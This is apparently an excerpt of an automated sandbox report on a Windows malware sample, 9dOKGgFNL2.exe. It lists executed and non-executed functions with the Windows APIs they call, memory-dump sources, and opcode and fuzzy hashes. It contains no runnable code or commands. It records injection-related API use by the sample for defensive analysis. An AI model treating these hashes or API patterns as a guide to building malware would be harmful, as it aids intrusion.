Instruction Fuzzy Hash: 7D1149B59003498BDB20DFAAD8457EEFBF8EB88324F24841AD519A7240CB75A540CBA1

Function 07D75EC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D75F2E

Strings

^gd, xrefs: 07D75ED7

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: AllocVirtual
String ID: ^gd
API String ID: 4275171209-4160683662
Opcode ID: d59daa9eccd9585eabe8314d511294785603aebd90f16618ddf79b8f6123677a
Instruction ID: 01f9c5d17ada0f31a8224497628de53cddaa040991fcee9ce5246835da72fca8
Opcode Fuzzy Hash: d59daa9eccd9585eabe8314d511294785603aebd90f16618ddf79b8f6123677a
Instruction Fuzzy Hash: 661156B19002099FCB20DFAAC845BDEFBF5EF88324F20841AE519A7250C775A510DBA1

Function 07D75900 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07D75962

Strings

^gd, xrefs: 07D75917

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: ResumeThread
String ID: ^gd
API String ID: 947044025-4160683662
Opcode ID: bb32e20ed7eaa6cac4d6831f78914c48cb9a2feebf8cb1427143948315e37a27
Instruction ID: 47c06aeec1ba90e4d692e8b39a9a7bc065a6a6f2a22216e1fa3a4acc6455fb79
Opcode Fuzzy Hash: bb32e20ed7eaa6cac4d6831f78914c48cb9a2feebf8cb1427143948315e37a27
Instruction Fuzzy Hash: E4113AB1D003498FDB20DFAAD4457AEFBF5EF88324F24841AD519A7340C775A544CB91

Function 07D78A50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D78AB5

Strings

^gd, xrefs: 07D78A72

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MessagePost
String ID: ^gd
API String ID: 410705778-4160683662
Opcode ID: aa0da771c313a41028ba9a73e810cdcaa6465e11ef9635d724a152730958c09b
Instruction ID: 5d2850a7d8ef8e728ed13f94745c08b6e74a71b5aa5493b6ab6d879d89e7edbd
Opcode Fuzzy Hash: aa0da771c313a41028ba9a73e810cdcaa6465e11ef9635d724a152730958c09b
Instruction Fuzzy Hash: A311E3B5800349DFDB20CF99D585BDEFBF8EB58324F24845AD558A7240C375A544CFA1

Function 031FB0B8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031FB11E

Strings

^gd, xrefs: 031FB0D7

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID: HandleModule
String ID: ^gd
API String ID: 4139908857-4160683662
Opcode ID: e17028d9ef33532f23a5a6c64834fcea115e8e810de7f907eaa04cd0f3290347
Instruction ID: 138f58771881b3c8da14516d3689fabfe646c3b9d5f70f78832d9c3b511608d3
Opcode Fuzzy Hash: e17028d9ef33532f23a5a6c64834fcea115e8e810de7f907eaa04cd0f3290347
Instruction Fuzzy Hash: 121110B5C042498FCB20DF9AD844BDEFBF4EF88324F24841AD929A7200C379A545CFA1

Function 07D72BA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D78AB5

Strings

^gd, xrefs: 07D78A72

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID: MessagePost
String ID: ^gd
API String ID: 410705778-4160683662
Opcode ID: 5953f70efe749d8806ac8f23cec338d06277acc0251aad89cd77ee750347ffec
Instruction ID: dd1c1f811858dfa2dcb95de7878a57a9a75242b8424a3437f19f5d2597e68377
Opcode Fuzzy Hash: 5953f70efe749d8806ac8f23cec338d06277acc0251aad89cd77ee750347ffec
Instruction Fuzzy Hash: D211E3B5800349DFDB10DF99C589BDEFBF8EB48324F20845AE518A7200D375A944CFA1

Function 0166D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba10621d166512b86a0d1e00787a7e710cd85a2f6021cb736e53ad1982f3e5d3
Instruction ID: 29120aaa3c96afa93c8bf8919a292d669157ab225f8e70d9537af5594239068e
Opcode Fuzzy Hash: ba10621d166512b86a0d1e00787a7e710cd85a2f6021cb736e53ad1982f3e5d3
Instruction Fuzzy Hash: 072136B1204244EFDB05DF48C9C0B66BF69FB98324F24C569E94A4B256C336E846CAA1

Function 0167D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe15b3d2dba38c64ae0f8a2f1a17dd687e5c0d723e9e35a5a2c06d087bade66
Instruction ID: 8300481b4b9dcff0fed0f3113a8040ba1b115c8cba1f24e575873b50dcc83ffa
Opcode Fuzzy Hash: bfe15b3d2dba38c64ae0f8a2f1a17dd687e5c0d723e9e35a5a2c06d087bade66
Instruction Fuzzy Hash: 6B2104B1604200EFDB05DF98D9C0B26BBA5FF84324F24C9ADEA4A4B356C336D447CA61

Function 0167D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e89d7d4009656d8957d38fcfe75965fc59b4fef236d858eda1fa885feb051da0
Instruction ID: 319868f7ea67fd561be2a90cb1ea0d7ed9bfe82b74a2b2fb4ddea4d92c9babb2
Opcode Fuzzy Hash: e89d7d4009656d8957d38fcfe75965fc59b4fef236d858eda1fa885feb051da0
Instruction Fuzzy Hash: 2621D0B5604200DFDB16DF68D9C0B26BB65EF84354F24C96DE90A4B396C33AD447CA61

Function 0166D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 74ea317fa38ae972ece973f30b441cd2cad2cbe3f5d47e1c7c66d48d17d36a14
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: A011DF72504240DFDB12CF44D9C0B56BF72FB84324F24C2A9D9494B656C33AE85ACBA1

Function 0167D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 5b9f273745b3af4711916aac4b31f29673be2b82e045380da6ddb91cff0829bb
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 5311BE75504280CFDB12CF54D9C4B15BB62FB44314F24CAAAD8094B756C33AD44ACB61

Function 0167D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739994212.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 2d74189fd4a1263098308208c3639a67222d4a0953461c10e171d61c6953a30c
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: C211BB75504280DFDB12CF54C9C0B15BFA2FF84224F28CAAAD9494B796C33AD44ACB61

Function 0166D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0ae6916a6d98d5cf02345c041baa4d05af2160ed6a12ea40bfd6e56ab4155a
Instruction ID: f8f24876778a302248df61c4b4b7499675fbe362a4208d065c0e41b59d30e9d3
Opcode Fuzzy Hash: db0ae6916a6d98d5cf02345c041baa4d05af2160ed6a12ea40bfd6e56ab4155a
Instruction Fuzzy Hash: D9012B712043809AE7104EA9DDC4B37BF9CDF41364F18C55AED484A282C73D9841CBB2

Function 0166D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739953630.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_166d000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d221f8e5e56047ccb8581d273b327bd2eee2fce65fc272f35fdba920e8d374
Instruction ID: 3d83536bbfe6c24b3710eb096601fe6430036835a090ecab82eca8a02388da0c
Opcode Fuzzy Hash: 56d221f8e5e56047ccb8581d273b327bd2eee2fce65fc272f35fdba920e8d374
Instruction Fuzzy Hash: E1F0C2715043809BE7108E19DCC4B62FF9CEB41234F18C05AED484A286C379A840CBB1

Non-executed Functions

Function 07D735A8 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abed61a4c1853b49b5d3aa1902310bb37fa9c69f43e902908a05cfcbc37a31b1
Instruction ID: a88b5e18b3feb52fa36da963ce45694e0aa6ceb683c339876d3c978da4226596
Opcode Fuzzy Hash: abed61a4c1853b49b5d3aa1902310bb37fa9c69f43e902908a05cfcbc37a31b1
Instruction Fuzzy Hash: 49E119B4E042598FCB14CFA9C5809AEFBB6FF89300F248169E455AB355D731AD82CF60

Function 07D73E38 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f845fc59abe717d33d71dfeaa4f13cecd465ca4e3abcc24c102fcab203e7da02
Instruction ID: 8f181c38afe5122087ba1a2a07ae22c540ac3b6606734dcb45bfaf70d8e8bac5
Opcode Fuzzy Hash: f845fc59abe717d33d71dfeaa4f13cecd465ca4e3abcc24c102fcab203e7da02
Instruction Fuzzy Hash: 89E1E7B4E041598FCB14DFA9C5809AEFBB6FF89304F249169E815AB355D730AD82CF60

Function 07D73A00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e205980fca2e481765a70b41afd1df192b1c51c5924a48a589743baf0bbe3b
Instruction ID: a53dcc3cc9a676b9fc66b1795aac5a06c0456a094ccd67dc3fdf1a34c7084f97
Opcode Fuzzy Hash: 33e205980fca2e481765a70b41afd1df192b1c51c5924a48a589743baf0bbe3b
Instruction Fuzzy Hash: 46E1E7B4E041598FCB14CFA9C5849AEFBB6FF89304F249169E815AB355D730AD82CF60

Function 07D759B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032ea550b765ea50bf23914a32bba86b0a9e4cdb4c51c822f16392f033329b4b
Instruction ID: 93791d756ebfe0097a7c6505e91bac38dbd1aae4e94a0493307e67ede2163ffd
Opcode Fuzzy Hash: 032ea550b765ea50bf23914a32bba86b0a9e4cdb4c51c822f16392f033329b4b
Instruction Fuzzy Hash: EEE1F9B4E001598FCB14CFA9D5809AEFBB6FF49304F249169E815AB355D730AD82CF61

Function 07D750D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479dab6922a50e07c69afd3e8f8c1729e53495084c719ef3ea2ea1d9fe5a05bc
Instruction ID: f011212525d7b1e41a5f2286b3418d56c1cd1d51236ac68822d9d1decd5c4c99
Opcode Fuzzy Hash: 479dab6922a50e07c69afd3e8f8c1729e53495084c719ef3ea2ea1d9fe5a05bc
Instruction Fuzzy Hash: 2CE107B4E001598FCB14CFA9D5809AEFBB6FF89305F249169E805AB355D730AD82CF61

Function 031FF044 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3349ce40d7ac5e5b5cba8dc10db985000d5772f9fe2b9fc26c379f8af524e9
Instruction ID: d513cf7629e545e07c2d398b6ca1a7ff8d2daa2636d52573ce3e599619b0fa0b
Opcode Fuzzy Hash: 6b3349ce40d7ac5e5b5cba8dc10db985000d5772f9fe2b9fc26c379f8af524e9
Instruction Fuzzy Hash: 8BA17036E00309CFCF05DFB4C98459EB7B2FF88300B15856AEA05AB265DB71D956CB80

Function 07D73E29 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad103a1f8d30e43c68f093271330b379c87e19523896b96ceb4050907e2a71f
Instruction ID: 71fc6d35b6d3e6cf9e6552aa331e86b52cad6cbf2f876b0ab84bbe8e6f795738
Opcode Fuzzy Hash: fad103a1f8d30e43c68f093271330b379c87e19523896b96ceb4050907e2a71f
Instruction Fuzzy Hash: 73511CB1E042598FCB14CFAAD5805AEFBF6FF89304F24816AD418AB255D7319942CFA1

Analysis Process: 9dOKGgFNL2.exePID: 7712, Parent PID: 7536COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	2

Executed Functions

Function 071FC198 Relevance: 1.8, Strings: 1, Instructions: 536COMMON

Download Yara Rule

Strings

$fq, xrefs: 071FC42C

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: de7a91d22bbd2186ef92117731f5d71a792683cd768e813999cf752a11f11586
Instruction ID: cd7f0f145b5b7b79851bb645292e2cf6a6cf6884fa10dc8fb3618d5827621a6b
Opcode Fuzzy Hash: de7a91d22bbd2186ef92117731f5d71a792683cd768e813999cf752a11f11586
Instruction Fuzzy Hash: 541284B4B002198FCB15DF68C4949AEBBF6FF88710B158569D906EB3A5DB30DC41CBA0

Function 071FEAC0 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 197e2cc996537446768ff2594f5d852a779ac6a46bd5cec3ed69a467db40b0ee
Instruction ID: 12f1911a7c7923d3800f4936544d3318f65d388397f0f22e73883321f923b2d8
Opcode Fuzzy Hash: 197e2cc996537446768ff2594f5d852a779ac6a46bd5cec3ed69a467db40b0ee
Instruction Fuzzy Hash: F312A4B1A00209DFCB15DFA8D880B9EBBF2FF84300F558569E505AB2A1DB31ED45CB90

Function 071FDC28 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

d, xrefs: 071FDE79

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 129108a8b5ad28b58ba2e008310058e191ddc6f5cdeb5eea5eb5470b15e2768a
Instruction ID: 79c4896c3b537430388f3fb58bdd3ed9cd7ceec0e6ab5569263c350bc6896525
Opcode Fuzzy Hash: 129108a8b5ad28b58ba2e008310058e191ddc6f5cdeb5eea5eb5470b15e2768a
Instruction Fuzzy Hash: ECC169B57006028FC715CF19D4A096ABBF2FF89310B55C959E59A9B3A6DB30FC46CB80

Function 067D75E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656

Memory Dump Source

Source File: 00000002.00000002.1869234543.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_9dOKGgFNL2.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b10bc823b978ebc6e9baf5f4de76ccfd0188f142d9df555719abb9a7de98904b
Instruction ID: 87481c60ee9a7d79889ceddf7540bd8f8758747ff76cdb4fe3f42147ba890391
Opcode Fuzzy Hash: b10bc823b978ebc6e9baf5f4de76ccfd0188f142d9df555719abb9a7de98904b
Instruction Fuzzy Hash: 441126B5C002498FCB10DF9AC844ADEFBF5EF88320F14842AD429A7710D775A546CFA1

Function 067D6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656

Memory Dump Source

Source File: 00000002.00000002.1869234543.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_67d0000_9dOKGgFNL2.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5c217153fbf4db7a5db4b6a9b28f025d484d88deb05f65c90a5cbc004fb870a1
Instruction ID: 74114b77a5f853f6e13ab12801a80deeb9d3dbe09fd96b6bad4e6a61a4bb1cac
Opcode Fuzzy Hash: 5c217153fbf4db7a5db4b6a9b28f025d484d88deb05f65c90a5cbc004fb870a1
Instruction Fuzzy Hash: 671112B1C002498FCB14DF9AC844A9EFBF5AB88220F14842AD429A7600E775A545CFA5

Function 013E0CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 013E0D47

Memory Dump Source

Source File: 00000002.00000002.1858719228.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_9dOKGgFNL2.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: b88c4dd386e16708831685177cf4144913eb45069d4938ae099f8b11db67537c
Instruction ID: c61f1e9ec45f47d9260931bd70a58b8f2fa5e186d2b624456ece1c70434bbe2e
Opcode Fuzzy Hash: b88c4dd386e16708831685177cf4144913eb45069d4938ae099f8b11db67537c
Instruction Fuzzy Hash: BB1134B5D003498FCB24CFAAC4497EEFBF5AB88324F24841AD519A7240C6796544CBA0

Function 013E0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 013E0D47

Memory Dump Source

Source File: 00000002.00000002.1858719228.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_9dOKGgFNL2.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: f62a0c78e041ae871e7f93b4ef3ca2cdb7da30a817f10f927c644ab2377a08e8
Instruction ID: bd2f81d8281812d1c594a97cfd0fc13ef941841d6fd3e6d9bb10b193927ca489
Opcode Fuzzy Hash: f62a0c78e041ae871e7f93b4ef3ca2cdb7da30a817f10f927c644ab2377a08e8
Instruction Fuzzy Hash: 191136B1D003498FDB24DFAAC44579FFFF5AB48324F20841AD519A7240CB79A544CBA1

Function 071FC8A0 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

,jq, xrefs: 071FCAD8

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: ,jq
API String ID: 0-1538246120
Opcode ID: ea9c149da213a2e0fd6196bb82278849aeca205e8d458e057ec8cbc6700e2f0a
Instruction ID: 2f58550109ad6e1038e58794948936db66076d5cf7d7ac96f68fbef201593f4c
Opcode Fuzzy Hash: ea9c149da213a2e0fd6196bb82278849aeca205e8d458e057ec8cbc6700e2f0a
Instruction Fuzzy Hash: 5871A2747102058FC718DF39C498A2ABBE6AF89614B1584AAE606CF3F1DF70DC41DBA0

Function 06821550 Relevance: 1.4, Instructions: 1412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ceff2c967c59500336506480122d3c185e9cb273e5ecaf5a1c74d80be1f6428
Instruction ID: 444007334dbd1ae0b660bf1a121e5023f4c772036c1cc54545ce4760385eec0c
Opcode Fuzzy Hash: 9ceff2c967c59500336506480122d3c185e9cb273e5ecaf5a1c74d80be1f6428
Instruction Fuzzy Hash: 0FC23C74B002189FCB54DF58C891EEDBBB6FF88700F108199E645AB361DB71AE858F91

Function 071FC100 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071FC16D

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: 4'fq
API String ID: 0-2007657732
Opcode ID: b4ec3dc2942616b5fe0097da7e2522a67397ba6a66b3954c08511b0d573b3379
Instruction ID: 629d8110e2b070e2f85d848aec9a70576653cc13826ea4d93b84afc449a70f9b
Opcode Fuzzy Hash: b4ec3dc2942616b5fe0097da7e2522a67397ba6a66b3954c08511b0d573b3379
Instruction Fuzzy Hash: CF0126B12002005BC708EB78D4A0A6F7BEAEBC52807045969D0458B655EF30AC0693E1

Function 071FC110 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071FC16D

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID: 4'fq
API String ID: 0-2007657732
Opcode ID: c35b68b006405bcd9a9f6f18b833308ca90838ee1ff608a496ab443d9f3d91f5
Instruction ID: 95760534f33f69d1f603b98be89a926db9c4d0660666c0d3192c7688c43a61de
Opcode Fuzzy Hash: c35b68b006405bcd9a9f6f18b833308ca90838ee1ff608a496ab443d9f3d91f5
Instruction Fuzzy Hash: D8F096713002115BC61CE768D4A096F77D7FBC52503545E29D0468B754EF30AC4697E1

Function 0682349D Relevance: 1.3, Instructions: 1280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b88a74bd92db3cec0e52915b89481e9e9498f6392249fb544e2420862b1bfb
Instruction ID: c6ab9cefb149a7f6a0ec8f1dc4ac3e85077ba3c9b1f81152b46880c9be3d40c0
Opcode Fuzzy Hash: 53b88a74bd92db3cec0e52915b89481e9e9498f6392249fb544e2420862b1bfb
Instruction Fuzzy Hash: 86A1C374B002559FCB44DFA8C8A49AEBBF2EF88700F14806AE616DB3A1DB35DC45CB51

Function 06820048 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1869328121.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6820000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c246183e9b30831e837758af5f0b6604075b50ac9afee5c1abd35bd0235e1c
Instruction ID: c1e17c1dcb60f4fba31dff22a8300ab904100168018ba11586ef345f6ae65721
Opcode Fuzzy Hash: e9c246183e9b30831e837758af5f0b6604075b50ac9afee5c1abd35bd0235e1c
Instruction Fuzzy Hash: 784259707406298FCB64AFA8D49096FBBB2FBC1704B004A5CD542AF795CF76ED058B86

Function 071FCB08 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1871820297.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71f0000_9dOKGgFNL2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1afb94a562d5c9a902c088291debad29b7f94a6fcb2e605a8d07e677cb20bd
Instruction ID: e9613170617b2662bd23aa238d883adc28c059346bfcca028694e20d1934dbe5
Opcode Fuzzy Hash: 8c1afb94a562d5c9a902c088291debad29b7f94a6fcb2e605a8d07e677cb20bd
Instruction Fuzzy Hash: 6C327BB47006058FCB15DF79C494A6ABBF2FF89300B1584A9E546DB3A2DB31EC45CBA1

Function 06820001 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

